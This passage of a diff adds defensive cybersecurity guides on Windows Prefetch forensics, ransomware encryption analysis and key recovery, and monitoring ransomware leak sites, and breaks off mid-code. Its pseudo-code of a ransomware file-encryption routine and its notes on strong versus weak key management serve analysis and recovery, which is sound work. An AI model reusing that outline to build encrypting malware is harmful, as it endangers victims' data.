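Exact matching trades recall for precision: it avoids the false positives of substring search but misses renamed or versioned binaries, so it works best alongside the broader `grep` patterns rather than in place of them.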
|
||||
|
||||
### Step 5: Build Execution Timeline
|
||||
|
||||
```bash
# Create timeline from prefetch data
python3 << 'PYEOF'
import json
import csv

with open('/cases/case-2024-001/analysis/prefetch_analysis.json') as f:
    data = json.load(f)

timeline = []
for entry in data:
    if 'last_run_times' in entry:
        for ts in entry['last_run_times']:
            if ts:
                timeline.append({
                    'timestamp': ts,
                    'executable': entry['executable'],
                    'run_count': entry['run_count'],
                    'source': 'Prefetch'
                })
    elif 'last_run' in entry and entry['last_run']:
        timeline.append({
            'timestamp': entry['last_run'],
            'executable': entry['executable'],
            'run_count': entry['run_count'],
            'source': 'Prefetch'
        })

# Sort chronologically
timeline.sort(key=lambda x: x['timestamp'])

# Write timeline CSV
with open('/cases/case-2024-001/analysis/execution_timeline.csv', 'w', newline='') as f:
    writer = csv.DictWriter(f, fieldnames=['timestamp', 'executable', 'run_count', 'source'])
    writer.writeheader()
    writer.writerows(timeline)

# Print suspicious time window
for entry in timeline:
    if '2024-01-15' in entry['timestamp'] or '2024-01-16' in entry['timestamp']:
        print(f"  {entry['timestamp']} | {entry['executable']} (x{entry['run_count']})")
PYEOF
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|---------|-------------|
| Prefetch | Windows performance optimization that pre-loads application data and, as a side effect, records execution |
| SCCA signature | Magic bytes at offset 4 identifying a valid (uncompressed) Prefetch file |
| Path hash | Hash of the executable's full path (a Prefetch-specific hash, not a CRC) that forms the eight hex digits in the .pf filename |
| Run count | Number of times the executable has been launched (may wrap around) |
| Last run timestamps | Windows 8+ stores up to 8 most recent execution timestamps |
| Referenced files | List of files and directories accessed during the first 10 seconds of execution |
| Volume information | Drive serial number and creation date identifying the source volume |
| MAM compression | Windows 10 Prefetch files are compressed (`MAM\x04` header, Xpress Huffman) and must be decompressed before parsing |
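

To illustrate the MAM row, the sketch below checks for the compressed-file header and reads the declared decompressed size. It assumes the commonly documented layout (a 4-byte `MAM\x04` signature followed by a 32-bit little-endian size); `read_mam_header` is a hypothetical helper, and the sketch does not perform the decompression itself.

```python
import struct


def read_mam_header(data):
    """Return the declared decompressed size for a MAM-compressed file, else None."""
    if len(data) < 8 or data[:4] != b"MAM\x04":
        return None
    # Assumed layout: signature (4 bytes) + decompressed size (uint32, little-endian)
    (decompressed_size,) = struct.unpack_from("<I", data, 4)
    return decompressed_size


if __name__ == "__main__":
    # Synthetic header for demonstration; not taken from a real Prefetch file
    sample = b"MAM\x04" + struct.pack("<I", 123456) + b"\x00" * 16
    print(read_mam_header(sample))
```

A `None` result on a file that carries the `SCCA` signature at offset 4 means the file is already uncompressed and can be parsed directly.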
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|------|---------|
| PECmd | Eric Zimmerman's Prefetch parser with CSV/JSON output |
| WinPrefetchView | NirSoft GUI tool for viewing Prefetch files |
| python-prefetch | Python library for parsing Prefetch files |
| Prefetch Hash Calculator | Tool to calculate expected hash from executable paths |
| KAPE | Automated artifact collection including Prefetch |
| Autopsy | Forensic platform with Prefetch analysis module |
| Plaso/log2timeline | Super-timeline tool that includes Prefetch parser |
| Velociraptor | Endpoint agent with Prefetch collection and analysis artifacts |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Confirming Malware Execution**
|
||||
Search Prefetch directory for the malware executable name, confirm execution via Prefetch existence, extract run count and last run time, identify referenced DLLs to understand malware behavior, correlate with registry autorun entries.
|
||||
|
||||
**Scenario 2: Attacker Tool Usage Timeline**
|
||||
Identify Prefetch files for PsExec, Mimikatz, BloodHound, and other attacker tools, build chronological timeline of tool execution, determine the sequence of the attack (reconnaissance, credential theft, lateral movement), match timestamps with network connection logs.
|
||||
|
||||
**Scenario 3: Data Staging and Exfiltration**
|
||||
Look for Prefetch entries of compression tools (7z, WinRAR, zip), identify execution of file transfer utilities (rclone, FTP clients), check for cloud storage client execution, and build a timeline of when data staging and transfer occurred.
|
||||
|
||||
**Scenario 4: Anti-Forensics Detection**
|
||||
Check for execution of known anti-forensic tools (CCleaner, Eraser, SDelete), identify if Prefetch directory was recently cleared (fewer files than expected for active system), note timestamps of anti-forensic tool execution relative to other evidence.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Prefetch Analysis Summary:
|
||||
System: Windows 10 Pro (Build 19041)
|
||||
Prefetch Files: 234
|
||||
Analysis Period: All available execution history
|
||||
|
||||
Execution Statistics:
|
||||
Total unique executables: 234
|
||||
First execution: 2023-06-15 (system install)
|
||||
Latest execution: 2024-01-18 23:45 UTC
|
||||
|
||||
Suspicious Executions:
|
||||
MIMIKATZ.EXE-5F2A3B1C.pf
|
||||
Run Count: 3 | Last: 2024-01-16 02:30:15 UTC
|
||||
PSEXEC.EXE-AD70946C.pf
|
||||
Run Count: 7 | Last: 2024-01-16 02:45:30 UTC
|
||||
RCLONE.EXE-1F3E5A2B.pf
|
||||
Run Count: 2 | Last: 2024-01-17 03:15:00 UTC
|
||||
POWERSHELL.EXE-022A1004.pf
|
||||
Run Count: 145 | Last: 2024-01-18 14:00:00 UTC
|
||||
|
||||
Attack Timeline (from Prefetch):
|
||||
2024-01-15 14:32 - POWERSHELL.EXE (initial access)
|
||||
2024-01-16 02:30 - MIMIKATZ.EXE (credential theft)
|
||||
2024-01-16 02:45 - PSEXEC.EXE (lateral movement)
|
||||
2024-01-17 03:15 - RCLONE.EXE (data exfiltration)
|
||||
|
||||
Report: /cases/case-2024-001/analysis/execution_timeline.csv
|
||||
```
|
||||
@@ -0,0 +1,327 @@
|
||||
---
|
||||
name: analyzing-ransomware-encryption-mechanisms
|
||||
description: >
|
||||
Analyzes encryption algorithms, key management, and file encryption routines used by
|
||||
ransomware families to assess decryption feasibility, identify implementation weaknesses,
|
||||
and support recovery efforts. Covers AES, RSA, ChaCha20, and hybrid encryption schemes.
|
||||
Activates for requests involving ransomware cryptanalysis, encryption analysis, key
|
||||
recovery assessment, or ransomware decryption feasibility.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, ransomware, encryption, cryptanalysis, reverse-engineering]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Ransomware Encryption Mechanisms
|
||||
|
||||
## When to Use
|
||||
|
||||
- A ransomware infection has occurred and recovery requires understanding the encryption scheme used
|
||||
- Assessing whether decryption is possible without paying the ransom (implementation flaws, known decryptors)
|
||||
- Reverse engineering ransomware to identify the encryption algorithm, key derivation, and key storage mechanism
|
||||
- Developing a decryptor tool when a weakness in the ransomware's cryptographic implementation is identified
|
||||
- Classifying a ransomware sample by its encryption approach to attribute it to a known family
|
||||
|
||||
**Do not use** for production data recovery operations without first verifying the decryption method on test copies of encrypted files.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Ghidra or IDA Pro for reverse engineering the ransomware binary
|
||||
- Python 3.8+ with `pycryptodome` library for testing encryption/decryption routines
|
||||
- Sample encrypted files and their corresponding plaintext originals (known-plaintext pairs)
|
||||
- Access to the ransomware binary (unpacked if applicable)
|
||||
- Familiarity with symmetric (AES, ChaCha20) and asymmetric (RSA) cryptographic algorithms
|
||||
- NoMoreRansom.org database for checking existing free decryptors
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify the Encryption Algorithm
|
||||
|
||||
Determine which cryptographic algorithm the ransomware uses:
|
||||
|
||||
```python
# Check for Windows Crypto API usage in imports
import pefile

pe = pefile.PE("ransomware.exe")

crypto_apis = {
    "CryptAcquireContextA": "Windows CryptoAPI",
    "CryptAcquireContextW": "Windows CryptoAPI",
    "CryptGenKey": "Windows CryptoAPI key generation",
    "CryptEncrypt": "Windows CryptoAPI encryption",
    "CryptImportKey": "Windows CryptoAPI key import",
    "BCryptOpenAlgorithmProvider": "Windows CNG (modern crypto)",
    "BCryptEncrypt": "Windows CNG encryption",
    "BCryptGenerateKeyPair": "Windows CNG asymmetric key gen",
}

print("Crypto API Imports:")
# DIRECTORY_ENTRY_IMPORT is missing when the sample has no import table (common for packed binaries)
for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
    dll = entry.dll.decode(errors="replace")
    for imp in entry.imports:
        # Imports by ordinal have no name
        name = imp.name.decode(errors="replace") if imp.name else None
        if name in crypto_apis:
            print(f"  {dll} -> {name}: {crypto_apis[name]}")
```
|
||||
|
||||
```
|
||||
Common Ransomware Encryption Schemes:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
AES-256-CBC + RSA-2048: Most common hybrid scheme (LockBit, REvil, Conti)
|
||||
AES-256-CTR + RSA-4096: Stream cipher mode variant (BlackCat/ALPHV)
|
||||
ChaCha20 + RSA-4096: Modern stream cipher (Hive, Royal)
|
||||
Salsa20 + ECDH: Curve25519 key exchange (Babuk)
|
||||
AES-128-ECB: Weak mode - potential decryption via known-plaintext
|
||||
XOR-only: Trivial encryption - usually recoverable when known plaintext is available
|
||||
Custom algorithm: Often contains implementation flaws
|
||||
```
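
When a sample links its cipher statically instead of calling the Windows APIs, well-known constants can hint at the algorithm. The sketch below searches a byte blob for the first row of the AES S-box and for the Salsa20/ChaCha key-setup strings. `SIGNATURES` and `find_crypto_constants` are hypothetical names, and the list is deliberately short.

```python
# Byte patterns that commonly appear in statically linked cipher implementations
SIGNATURES = {
    "AES S-box (table-based AES)": bytes.fromhex("637c777bf26b6fc53001672bfed7ab76"),
    "Salsa20/ChaCha constant (256-bit key)": b"expand 32-byte k",
    "Salsa20/ChaCha constant (128-bit key)": b"expand 16-byte k",
}


def find_crypto_constants(blob):
    """Return {label: first_offset} for each signature found in blob."""
    hits = {}
    for label, pattern in SIGNATURES.items():
        offset = blob.find(pattern)
        if offset != -1:
            hits[label] = offset
    return hits


if __name__ == "__main__":
    # Synthetic blob for demonstration; for a real sample, read the unpacked binary
    blob = b"\x00" * 10 + b"expand 32-byte k" + b"\xff" * 10
    print(find_crypto_constants(blob))
```

A miss is not evidence of absence: packed samples, AES-NI based code, and OS-provided crypto leave none of these tables in the binary, so this check only supplements the import analysis.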
|
||||
|
||||
### Step 2: Analyze Key Generation and Management
|
||||
|
||||
Reverse engineer how encryption keys are generated and stored:
|
||||
|
||||
```
|
||||
Key Management Patterns in Ransomware:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
1. STRONG (no recovery possible without key):
|
||||
- Per-file AES key generated with CryptGenRandom
|
||||
- AES key encrypted with embedded RSA public key
|
||||
- Encrypted key appended to each file or stored separately
|
||||
- RSA private key held only by attacker's C2 server
|
||||
|
||||
2. WEAK (potential recovery):
|
||||
- AES key derived from predictable seed (timestamp, PID)
|
||||
- Same AES key used for all files (single key compromise = full recovery)
|
||||
- Key transmitted to C2 before encryption starts (PCAP may contain key)
|
||||
- XOR with short repeating key (brute-forceable)
|
||||
- PRNG seeded with GetTickCount or time() (limited keyspace)
|
||||
|
||||
3. FLAWED IMPLEMENTATION:
|
||||
- ECB mode (preserves plaintext patterns)
|
||||
- Initialization vector (IV) reuse across files
|
||||
- Key stored in plaintext in memory (recoverable from memory dump)
|
||||
- Partial encryption (only first N bytes encrypted)
|
||||
```
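
The "limited keyspace" point for time-seeded PRNGs can be made concrete with a toy model. The sketch below uses Python's `random.Random` as a stand-in for a weak generator; real samples typically use a different PRNG (for example the C runtime's `rand()`), so `derive_key` is a hypothetical derivation that would need to be replaced with the one recovered from the binary.

```python
import random


def derive_key(seed, length=32):
    """Hypothetical weak derivation: a non-cryptographic PRNG seeded with a timestamp."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(length))


def recover_seed(target_key, start, end):
    """Try every seed in [start, end]; return the one that reproduces target_key."""
    for seed in range(start, end + 1):
        if derive_key(seed, len(target_key)) == target_key:
            return seed
    return None


if __name__ == "__main__":
    infection_time = 1705372215              # illustrative Unix timestamp
    key = derive_key(infection_time)
    # A one-hour window around the estimated infection time is only 3,601 candidates
    found = recover_seed(key, infection_time - 1800, infection_time + 1800)
    print(found == infection_time)
```

In a real case the key itself is unknown, so each candidate key would be tested by decrypting the first block of a file and comparing it with a known header, as in the timestamp brute-force test in Step 4.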
|
||||
|
||||
### Step 3: Examine File Encryption Routine
|
||||
|
||||
Reverse engineer the file processing logic:
|
||||
|
||||
```c
// Typical ransomware file encryption flow (decompiled pseudo-code from Ghidra):

void encrypt_file(char *filepath) {
    // 1. Check file extension against target list
    if (!is_target_extension(filepath)) return;

    // 2. Generate per-file AES key (32 bytes for AES-256)
    BYTE aes_key[32];
    CryptGenRandom(hProv, 32, aes_key);

    // 3. Generate random IV (16 bytes)
    BYTE iv[16];
    CryptGenRandom(hProv, 16, iv);

    // 4. Read file contents
    HANDLE hFile = CreateFile(filepath, GENERIC_READ, ...);
    DWORD file_size = GetFileSize(hFile, NULL);
    BYTE *plaintext = read_entire_file(hFile);

    // 5. Encrypt with AES-256-CBC
    BYTE *encrypted_data = aes_cbc_encrypt(plaintext, file_size, aes_key, iv);

    // 6. Encrypt AES key with RSA public key
    BYTE encrypted_key[256];  // RSA-2048 output
    rsa_encrypt(aes_key, 32, rsa_pubkey, encrypted_key);

    // 7. Write: encrypted_data + encrypted_key + IV to file
    write_file(filepath, encrypted_data, encrypted_key, iv);

    // 8. Rename file with ransomware extension
    rename_file(filepath, strcat(filepath, ".locked"));
}
```
|
||||
|
||||
### Step 4: Check for Cryptographic Weaknesses
|
||||
|
||||
Test the implementation for exploitable flaws:
|
||||
|
||||
```python
import hashlib

from Crypto.Cipher import AES


# Test 1: Check if same key is used for multiple files
# Compare encrypted versions of known files
def check_key_reuse(file1_enc, file2_enc):
    with open(file1_enc, "rb") as f:
        data1 = f.read()
    with open(file2_enc, "rb") as f:
        data2 = f.read()

    # Extract IVs (location depends on ransomware family)
    # If IVs are same and files share encrypted blocks -> same key
    iv1 = data1[-16:]  # Example: IV at end
    iv2 = data2[-16:]
    if iv1 == iv2:
        print("[!] Same IV detected - key reuse likely")
        return True
    return False


# Test 2: Check for predictable key derivation
# If key is derived from timestamp, iterate possible values
def brute_force_timestamp_key(encrypted_file, known_header, timestamp_range):
    with open(encrypted_file, "rb") as f:
        encrypted_data = f.read()

    iv = encrypted_data[-16:]          # Example: IV at end
    first_block = encrypted_data[:16]  # One AES block is enough to test a candidate

    for ts in timestamp_range:
        # Derive key the same way ransomware does (SHA-256 of the timestamp is an example)
        key = hashlib.sha256(str(ts).encode()).digest()
        cipher = AES.new(key, AES.MODE_CBC, iv)
        decrypted = cipher.decrypt(first_block)

        if decrypted[:len(known_header)] == known_header:
            print(f"[!] Key found! Timestamp: {ts}")
            return key

    return None


# Test 3: Check for ECB mode (pattern preservation)
def check_ecb_mode(encrypted_file):
    with open(encrypted_file, "rb") as f:
        data = f.read()
    # ECB produces identical ciphertext for identical plaintext blocks
    # Only full 16-byte blocks are compared; a trailing partial block is ignored
    blocks = [data[i:i+16] for i in range(0, len(data) - 15, 16)]
    unique = len(set(blocks))
    total = len(blocks)
    if total and unique < total * 0.95:
        print(f"[!] ECB mode likely: {total-unique} duplicate blocks out of {total}")
        return True
    return False
```
|
||||
|
||||
### Step 5: Attempt Key Recovery
|
||||
|
||||
Use identified weaknesses for key recovery:
|
||||
|
||||
```python
# Recovery Method 1: Extract key from memory dump
# Volatility plugin to scan for AES key schedules
# (plugin and option names differ between Volatility 3 releases; confirm with `vol -h`)
# vol3 -f memory.dmp windows.yarascan --yara-rule "aes_key_schedule"

# Recovery Method 2: Known-plaintext attack (weak algorithms)
def xor_key_recovery(encrypted_file, known_plaintext):
    """Recover a repeating XOR key from a known plaintext-ciphertext pair."""
    with open(encrypted_file, "rb") as f:
        ciphertext = f.read()

    # XOR of ciphertext and plaintext yields the keystream (the key, repeated)
    keystream = bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))

    # Find the shortest key length whose repetition reproduces the whole keystream.
    # At least two full repetitions are required, so short samples are inconclusive.
    for key_len in range(1, min(256, len(keystream) // 2 + 1)):
        candidate = keystream[:key_len]
        if all(keystream[i] == candidate[i % key_len] for i in range(len(keystream))):
            print(f"XOR key (length {key_len}): {candidate.hex()}")
            return candidate
    return None

# Recovery Method 3: Check NoMoreRansom for existing decryptors
# https://www.nomoreransom.org/en/decryption-tools.html
```
|
||||
|
||||
### Step 6: Document Encryption Analysis
|
||||
|
||||
Compile findings into a structured report:
|
||||
|
||||
```
|
||||
Analysis should document:
|
||||
- Algorithm identified (AES, RSA, ChaCha20, custom)
|
||||
- Key size and mode of operation (CBC, CTR, ECB, GCM)
|
||||
- Key generation method (CSPRNG, predictable seed, static key)
|
||||
- Key storage location (appended to file, registry, C2 transmission)
|
||||
- File modification pattern (full encryption, partial, header-only)
|
||||
- Targeted file extensions
|
||||
- Ransom note format and payment infrastructure
|
||||
- Decryption feasibility assessment (possible/impossible/partial)
|
||||
- Recommended recovery approach
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|------|------------|
| **Hybrid Encryption** | Combining symmetric (AES) for fast file encryption with asymmetric (RSA) for secure key wrapping; the standard ransomware approach |
| **Key Wrapping** | Encrypting the per-file symmetric key with the attacker's RSA public key so only the attacker's private key can decrypt it |
| **ECB Mode** | Electronic Codebook mode encrypts each block independently; preserves patterns in plaintext, a critical weakness enabling partial recovery |
| **Known-Plaintext Attack** | Using a known original file and its encrypted version to derive the encryption key; effective against XOR and weak stream ciphers |
| **Key Schedule** | The expanded form of an AES key in memory; scannable in memory dumps to recover encryption keys before they are erased |
| **CSPRNG** | Cryptographically Secure Pseudo-Random Number Generator; ransomware using CryptGenRandom produces unpredictable keys |
| **Partial Encryption** | Some ransomware only encrypts the first N bytes or every Nth block for speed; unencrypted portions may aid recovery |
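

Partial encryption can often be spotted by measuring entropy per chunk, since encrypted regions look close to random while most plaintext does not. The following is a minimal sketch; the 4096-byte chunk size and the 7.5 bits-per-byte threshold are assumptions to tune per case, and the function names are hypothetical.

```python
import math
import os
from collections import Counter


def shannon_entropy(chunk):
    """Shannon entropy of a byte string in bits per byte (0.0 to 8.0)."""
    if not chunk:
        return 0.0
    total = len(chunk)
    return -sum((n / total) * math.log2(n / total) for n in Counter(chunk).values())


def encrypted_regions(data, chunk_size=4096, threshold=7.5):
    """Return (offset, entropy) for each chunk whose entropy exceeds threshold."""
    regions = []
    for offset in range(0, len(data), chunk_size):
        entropy = shannon_entropy(data[offset:offset + chunk_size])
        if entropy > threshold:
            regions.append((offset, round(entropy, 2)))
    return regions


if __name__ == "__main__":
    # Synthetic file: 8 KiB of random bytes (stand-in for ciphertext) + 8 KiB of plaintext
    data = os.urandom(8192) + b"A" * 8192
    for offset, entropy in encrypted_regions(data):
        print(f"offset {offset}: {entropy} bits/byte")
```

High entropy alone does not prove encryption, because compressed formats (ZIP, JPEG, many media files) score similarly; comparing against a known-good copy of the same file type helps separate the two.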
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Ghidra**: Reverse engineering suite for analyzing ransomware encryption routines at the assembly level
|
||||
- **PyCryptodome**: Python cryptographic library for implementing and testing decryption routines
|
||||
- **NoMoreRansom.org**: Free decryption tool repository maintained by Europol and security vendors for known ransomware families
|
||||
- **Volatility**: Memory forensics framework for extracting encryption keys from RAM dumps of infected systems
|
||||
- **CryptoTester**: Tool for identifying cryptographic algorithms based on constants and code patterns
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Assessing Decryption Feasibility for a Ransomware Incident
|
||||
|
||||
**Context**: An organization is hit with ransomware encrypting file servers. Management needs to know if decryption is possible without paying the ransom before making a recovery decision.
|
||||
|
||||
**Approach**:
|
||||
1. Identify the ransomware family from ransom note, file extension, and sample hash (check ID Ransomware)
|
||||
2. Check NoMoreRansom.org for existing free decryptors for this family
|
||||
3. Reverse engineer the encryption routine in Ghidra to identify the algorithm and key management
|
||||
4. Test for implementation weaknesses (key reuse, predictable seeds, ECB mode)
|
||||
5. Check if PCAP from the incident captured the key transmission to C2 (if key was sent before encryption)
|
||||
6. Scan memory dumps from affected machines for AES key schedules in RAM
|
||||
7. Report findings: decryption possible/impossible with specific technical justification
|
||||
|
||||
**Pitfalls**:
|
||||
- Testing decryption methods on the only copy of encrypted files (always work on copies)
|
||||
- Assuming all files use the same key without verifying (some ransomware uses per-file keys)
|
||||
- Not checking for volume shadow copies (vssadmin) which ransomware may have failed to delete
|
||||
- Confusing the file encryption algorithm with the key wrapping algorithm in reports
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
RANSOMWARE ENCRYPTION ANALYSIS
|
||||
================================
|
||||
Sample: lockbit3.exe
|
||||
Family: LockBit 3.0 / LockBit Black
|
||||
SHA-256: abc123def456...
|
||||
|
||||
ENCRYPTION SCHEME
|
||||
File Cipher: AES-256-CTR (per-file unique key)
|
||||
Key Wrapping: RSA-2048 (public key embedded in binary)
|
||||
Key Generation: CryptGenRandom (CSPRNG - unpredictable)
|
||||
IV Generation: Random 16 bytes per file
|
||||
File Structure: [encrypted_data][rsa_encrypted_key(256B)][iv(16B)][magic(8B)]
|
||||
|
||||
TARGETED EXTENSIONS
|
||||
Total: 412 extensions targeted
|
||||
Categories: Documents (.doc, .xls, .pdf), Databases (.sql, .mdb),
|
||||
Archives (.zip, .7z), Source code (.py, .java, .cs)
|
||||
Excluded: .exe, .dll, .sys, .lnk (system files preserved)
|
||||
|
||||
IMPLEMENTATION ANALYSIS
|
||||
Key Strength: STRONG - per-file random keys, no reuse
|
||||
Mode Security: STRONG - CTR mode with unique nonces
|
||||
Key Storage: RSA-encrypted key appended to each file
|
||||
Shadow Copies: Deleted via vssadmin and WMI
|
||||
|
||||
DECRYPTION FEASIBILITY
|
||||
Without Key: NOT POSSIBLE
|
||||
- No implementation flaws identified
|
||||
- RSA-2048 key wrapping prevents brute force
|
||||
- CSPRNG prevents key prediction
|
||||
- No existing free decryptor available
|
||||
|
||||
RECOVERY OPTIONS
|
||||
1. Restore from offline backups (recommended)
|
||||
2. Check for volume shadow copies (low probability - ransomware deletes them)
|
||||
3. Memory forensics if machine was not rebooted (key may persist in RAM)
|
||||
4. Negotiate with attacker (last resort - no guarantee of decryption)
|
||||
```
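
The `File Structure` line in the sample report can be turned into a small parser for test copies of encrypted files. This sketch assumes exactly the illustrative layout shown above (`[encrypted_data][rsa_encrypted_key(256B)][iv(16B)][magic(8B)]`); it is not a verified description of any ransomware family, and `split_trailer` is a hypothetical helper.

```python
from typing import NamedTuple

# Field sizes taken from the illustrative layout in the sample report
KEY_LEN, IV_LEN, MAGIC_LEN = 256, 16, 8


class Trailer(NamedTuple):
    ciphertext: bytes
    wrapped_key: bytes
    iv: bytes
    magic: bytes


def split_trailer(blob):
    """Split an encrypted file into ciphertext, wrapped key, IV, and magic marker."""
    footer = KEY_LEN + IV_LEN + MAGIC_LEN
    if len(blob) < footer:
        raise ValueError("file too short to contain the trailer")
    body_end = len(blob) - footer
    key_end = body_end + KEY_LEN
    return Trailer(
        ciphertext=blob[:body_end],
        wrapped_key=blob[body_end:key_end],
        iv=blob[key_end:key_end + IV_LEN],
        magic=blob[-MAGIC_LEN:],
    )


if __name__ == "__main__":
    # Synthetic file built to match the assumed layout
    blob = b"C" * 100 + b"K" * KEY_LEN + b"I" * IV_LEN + b"MAGIC123"
    parts = split_trailer(blob)
    print(len(parts.ciphertext), len(parts.wrapped_key), parts.magic)
```

Comparing the `magic` field and the wrapped-key bytes across several files is a quick way to confirm the layout and to check whether keys are truly per-file.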
|
||||
@@ -0,0 +1,316 @@
|
||||
---
|
||||
name: analyzing-ransomware-leak-site-intelligence
|
||||
description: Monitor and analyze ransomware group data leak sites (DLS) to track victim postings, extract threat intelligence on group tactics, and assess sector-specific ransomware risk for proactive defense.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [ransomware, leak-site, data-leak, extortion, threat-intelligence, monitoring, dls, victim-tracking]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Ransomware Leak Site Intelligence
|
||||
|
||||
## Overview
|
||||
|
||||
Ransomware groups operating under double-extortion models maintain data leak sites (DLS) on Tor hidden services where they post victim names, stolen data samples, and countdown timers to pressure payment. In H1 2025, 96 unique ransomware groups were active, listing approximately 535 victims per month. Monitoring these sites provides intelligence on active threat groups, targeted sectors, geographic patterns, and emerging ransomware families. This skill covers safely collecting DLS intelligence, extracting structured data, tracking group activity trends, and producing sector-specific risk assessments.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `requests`, `beautifulsoup4`, `pandas`, `matplotlib` libraries
|
||||
- Tor proxy (SOCKS5) for accessing .onion sites or commercial DLS monitoring feeds
|
||||
- Understanding of ransomware double-extortion business model
|
||||
- Familiarity with major ransomware families (Qilin, Akira, LockBit, BlackCat, Clop)
|
||||
- Access to ransomware tracking feeds (Ransomwatch, RansomLook, DarkFeed)
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Double Extortion Model
|
||||
|
||||
Modern ransomware groups encrypt victim data AND exfiltrate it before encryption. Leak sites serve as public pressure: victims are listed with a countdown timer, partial data samples, and file trees. If ransom is not paid, full data is published. Some groups have moved to triple extortion, adding DDoS threats or contacting victims' customers directly.
|
||||
|
||||
### DLS Intelligence Value
|
||||
|
||||
Leak sites provide: victim identification (company name, sector, country), attack timeline (when listed, deadline, data published), data volume estimates, group capability assessment (sectors targeted, attack frequency, operational tempo), and trend analysis (new groups emerging, groups rebranding, law enforcement takedowns).
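
One way to hold these fields for analysis is a small normalized record. The sketch below is an assumption-laden example: `group_name` and `discovered` follow the feed fields used later in this skill, while `post_title`, `sector`, and `country` are assumed field names that may not exist in a given feed. Timestamps without an offset are treated as UTC.

```python
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional


@dataclass(frozen=True)
class VictimPosting:
    group: str
    victim: str
    discovered: datetime
    sector: Optional[str] = None
    country: Optional[str] = None


def normalize(record):
    """Convert a raw feed record (dict) into a VictimPosting.

    Raises ValueError if the 'discovered' timestamp is missing or malformed.
    """
    raw = record.get("discovered", "")
    discovered = datetime.fromisoformat(raw.replace("Z", "+00:00"))
    if discovered.tzinfo is None:
        # Assumption: feed timestamps without an offset are UTC
        discovered = discovered.replace(tzinfo=timezone.utc)
    return VictimPosting(
        group=record.get("group_name", "unknown").lower(),
        victim=record.get("post_title", "").strip(),
        discovered=discovered,
        sector=record.get("sector"),
        country=record.get("country"),
    )


if __name__ == "__main__":
    # Synthetic record for demonstration; not real victim data
    sample = {
        "group_name": "ExampleGroup",
        "post_title": " Example Corp ",
        "discovered": "2025-01-15 10:30:00.123456",
    }
    print(normalize(sample))
```

Keeping every timestamp timezone-aware avoids off-by-hours errors when postings from several feeds are merged into one timeline.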
|
||||
|
||||
### Safe Collection Practices
|
||||
|
||||
Never directly access DLS sites in a production environment. Use purpose-built monitoring services (Ransomwatch, DarkFeed, KELA, Flashpoint), Tor-isolated research VMs, commercial threat intelligence platforms, or community-maintained datasets. All analysis should be conducted in isolated environments with proper authorization.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Ingest Ransomware Leak Site Data from Public Feeds
|
||||
|
||||
```python
|
||||
import requests
|
||||
import json
|
||||
import pandas as pd
|
||||
from datetime import datetime, timedelta
|
||||
from collections import Counter
|
||||
|
||||
class RansomwareIntelCollector:
|
||||
"""Collect ransomware DLS intelligence from public tracking sources."""
|
||||
|
||||
RANSOMWATCH_API = "https://raw.githubusercontent.com/joshhighet/ransomwatch/main/posts.json"
|
||||
RANSOMWATCH_GROUPS = "https://raw.githubusercontent.com/joshhighet/ransomwatch/main/groups.json"
|
||||
|
||||
def __init__(self):
|
||||
self.posts = []
|
||||
self.groups = []
|
||||
|
||||
def fetch_ransomwatch_data(self):
|
||||
"""Fetch ransomware victim posts from ransomwatch."""
|
||||
resp = requests.get(self.RANSOMWATCH_API, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
self.posts = resp.json()
|
||||
print(f"[+] Loaded {len(self.posts)} victim posts from ransomwatch")
|
||||
else:
|
||||
print(f"[-] Failed to fetch posts: {resp.status_code}")
|
||||
|
||||
resp = requests.get(self.RANSOMWATCH_GROUPS, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
self.groups = resp.json()
|
||||
print(f"[+] Loaded {len(self.groups)} ransomware group profiles")
|
||||
|
||||
return self.posts
|
||||
|
||||
def get_recent_victims(self, days=30):
|
||||
"""Get victims posted in the last N days."""
|
||||
cutoff = datetime.now() - timedelta(days=days)
|
||||
recent = []
|
||||
for post in self.posts:
|
||||
try:
|
||||
discovered = datetime.fromisoformat(
|
||||
post.get("discovered", "").replace("Z", "+00:00")
|
||||
)
|
||||
if discovered.replace(tzinfo=None) >= cutoff:
|
||||
recent.append(post)
|
||||
except (ValueError, TypeError):
|
||||
continue
|
||||
print(f"[+] {len(recent)} victims in last {days} days")
|
||||
return recent
|
||||
|
||||
def get_group_activity(self, group_name):
|
||||
"""Get all posts by a specific ransomware group."""
|
||||
group_posts = [
|
||||
p for p in self.posts
|
||||
if p.get("group_name", "").lower() == group_name.lower()
|
||||
]
|
||||
print(f"[+] {group_name}: {len(group_posts)} total victims")
|
||||
return group_posts
|
||||
|
||||
collector = RansomwareIntelCollector()
|
||||
collector.fetch_ransomwatch_data()
|
||||
recent = collector.get_recent_victims(days=30)
|
||||
```
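The collector above compares a local `datetime.now()` against feed timestamps whose time zone has been stripped, which can shift the cutoff by several hours. A minimal sketch of one way to normalize both sides to UTC follows. The helper names `parse_discovered` and `is_recent` are hypothetical, and treating naive feed timestamps as UTC is an assumption that should be checked against the feed in use.

```python
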